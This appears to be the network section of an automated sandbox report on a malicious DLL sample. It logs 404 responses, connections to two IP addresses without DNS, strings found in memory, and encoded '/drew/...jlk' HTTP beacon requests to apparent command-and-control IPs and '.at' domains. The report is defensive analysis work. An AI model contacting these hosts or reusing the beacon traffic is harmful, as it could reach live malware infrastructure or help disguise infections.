<html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:05:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:05:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:06:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:06:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194214.157.187/
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.214.157.187/
Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8
Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/
Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/8
Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/drew/8aMvIN0oJqk/wfo22krGhemAS6/6H_2FPRAH0bqwevjC8Pk5/kXre7OAlPZjP7YB8/
Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/drew/cmlyVQ2zwKm8fCRpP0VB/i6Zv1FcucRsB3XE0xRC/6VGWBAMEz_2Fh6VbcTZ9sL/wE
Source: WerFault.exe, 00000007.00000002.314858058.00000000049C9000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312995086.00000000049C8000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312888145.00000000049C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/
Source: loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w
Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/g
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll String found in binary or memory: http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus
Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll String found in binary or memory: http://www.dhtmlcentral.com/tutorial.asp
Source: unknown DNS traffic detected: queries for: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic HTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic HTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
Source: global traffic HTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
